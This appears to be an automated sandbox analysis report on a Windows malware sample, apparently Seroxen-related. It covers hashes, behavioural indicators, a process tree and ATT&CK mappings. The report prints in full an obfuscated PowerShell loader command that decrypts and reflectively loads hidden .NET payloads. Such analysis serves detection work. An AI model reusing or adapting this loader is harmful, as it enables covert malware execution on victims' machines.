9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8

General

Target

9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe
Size

9.9MB
MD5

6ea921335b9d1f8f069c8565ed82528b
SHA1

fddbd654d2fc66afb3a564f0023055aa1dd9d7c4
SHA256

9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8
SHA512

a51e0b8473492d79310da2c301a6254a321108dec21afb958b5c59107404f3582e790955c647f8da1d5cffeb35bce6125f9a0db21bc11a2fe861d35919fdb274
SSDEEP

196608:Mddst66OMZd6bpxsc9Uo1UW4Z0GSphKExETwKOT2CK7y9vhvozz:wdspdGW61UW4Z0GSa3wtaCK+PoP

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2792	Install.bat.exe

Loads dropped DLL 1 IoCs

pid	Process
2624	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe
File opened for modification	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2792	Install.bat.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2792	Install.bat.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1080 wrote to memory of 2624	1080	9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe	28
PID 1080 wrote to memory of 2624	1080	9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe	28
PID 1080 wrote to memory of 2624	1080	9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe	28
PID 1080 wrote to memory of 2624	1080	9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe	28
PID 1080 wrote to memory of 2624	1080	9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe	28
PID 1080 wrote to memory of 2624	1080	9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe	28
PID 1080 wrote to memory of 2624	1080	9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe	28
PID 2624 wrote to memory of 2620	2624	cmd.exe	30
PID 2624 wrote to memory of 2620	2624	cmd.exe	30
PID 2624 wrote to memory of 2620	2624	cmd.exe	30
PID 2624 wrote to memory of 2620	2624	cmd.exe	30
PID 2620 wrote to memory of 1204	2620	net.exe	31
PID 2620 wrote to memory of 1204	2620	net.exe	31
PID 2620 wrote to memory of 1204	2620	net.exe	31
PID 2620 wrote to memory of 1204	2620	net.exe	31
PID 2624 wrote to memory of 2792	2624	cmd.exe	32
PID 2624 wrote to memory of 2792	2624	cmd.exe	32
PID 2624 wrote to memory of 2792	2624	cmd.exe	32
PID 2624 wrote to memory of 2792	2624	cmd.exe	32
PID 2624 wrote to memory of 2792	2624	cmd.exe	32
PID 2624 wrote to memory of 2792	2624	cmd.exe	32
PID 2624 wrote to memory of 2792	2624	cmd.exe	32

C:\Users\Admin\AppData\Local\Temp\9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe
"C:\Users\Admin\AppData\Local\Temp\9936d687086d0adfd38efa1304ad52f1007fb57027ebcfa2ca243cab7ff77ee8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS3A81.tmp\Install.bat" "
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2624
- - C:\Windows\SysWOW64\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:1204
- - C:\Users\Admin\AppData\Local\Temp\7zS3A81.tmp\Install.bat.exe
    "Install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function ujElq($Ccren){ $tevnr=[System.Security.Cryptography.Aes]::Create(); $tevnr.Mode=[System.Security.Cryptography.CipherMode]::CBC; $tevnr.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $tevnr.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzaKbTP9sQTOC2UkjkiYswZK/D51oAtv3nc6pLpjuc0='); $tevnr.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+qqVYCsvL/nM10VEia/PfA=='); $lcbnU=$tevnr.CreateDecryptor(); $return_var=$lcbnU.TransformFinalBlock($Ccren, 0, $Ccren.Length); $lcbnU.Dispose(); $tevnr.Dispose(); $return_var;}function vlZCq($Ccren){ $jChSq=New-Object System.IO.MemoryStream(,$Ccren); $UzJpg=New-Object System.IO.MemoryStream; $UYTwL=New-Object System.IO.Compression.GZipStream($jChSq, [IO.Compression.CompressionMode]::Decompress); $UYTwL.CopyTo($UzJpg); $UYTwL.Dispose(); $jChSq.Dispose(); $UzJpg.Dispose(); $UzJpg.ToArray();}function QvCtG($Ccren,$nYQYG){ $auHyU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$Ccren); $oyccn=$auHyU.EntryPoint; $oyccn.Invoke($null, $nYQYG);}$GyFwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\7zS3A81.tmp\Install.bat').Split([Environment]::NewLine);foreach ($ZWDON in $GyFwy) { if ($ZWDON.StartsWith('SEROXEN')) { $pZeTP=$ZWDON.Substring(7); break; }}$LAeFO=[string[]]$pZeTP.Split('\');$ShFcT=vlZCq (ujElq ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($LAeFO[0])));$WhVPo=vlZCq (ujElq ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($LAeFO[1])));QvCtG $WhVPo (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));QvCtG $ShFcT (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS3A81.tmp\Install.bat

Filesize
14.6MB

MD5
9567c6d0b81523dac4549e6e30ab8000

SHA1
ba7e0cf317686639bdce62c66e25321288c46ce1

SHA256
967c5336f76238389fb33c45f18952f94210edd466db555a5d3a0f4553ffd103

SHA512
3a67ff71cf513ea1a45ca3f5dc28a0125065a015c32a95db50cca8a5fa9c565c2595106acb75c1b188e5a4ae247e8f0a1fe9c857a412f3228a90a13a20de5072

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS3A81.tmp\Install.bat

Filesize
14.6MB

MD5
9567c6d0b81523dac4549e6e30ab8000

SHA1
ba7e0cf317686639bdce62c66e25321288c46ce1

SHA256
967c5336f76238389fb33c45f18952f94210edd466db555a5d3a0f4553ffd103

SHA512
3a67ff71cf513ea1a45ca3f5dc28a0125065a015c32a95db50cca8a5fa9c565c2595106acb75c1b188e5a4ae247e8f0a1fe9c857a412f3228a90a13a20de5072

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS3A81.tmp\Install.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS3A81.tmp\Install.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
\Users\Admin\AppData\Local\Temp\7zS3A81.tmp\Install.bat.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/2792-24-0x0000000073C10000-0x00000000741BB000-memory.dmp

Filesize
5.7MB

Download
memory/2792-25-0x0000000073C10000-0x00000000741BB000-memory.dmp

Filesize
5.7MB

Download
memory/2792-26-0x00000000026F0000-0x0000000002730000-memory.dmp

Filesize
256KB

Download
memory/2792-27-0x00000000026F0000-0x0000000002730000-memory.dmp

Filesize
256KB

Download
memory/2792-28-0x0000000073C10000-0x00000000741BB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing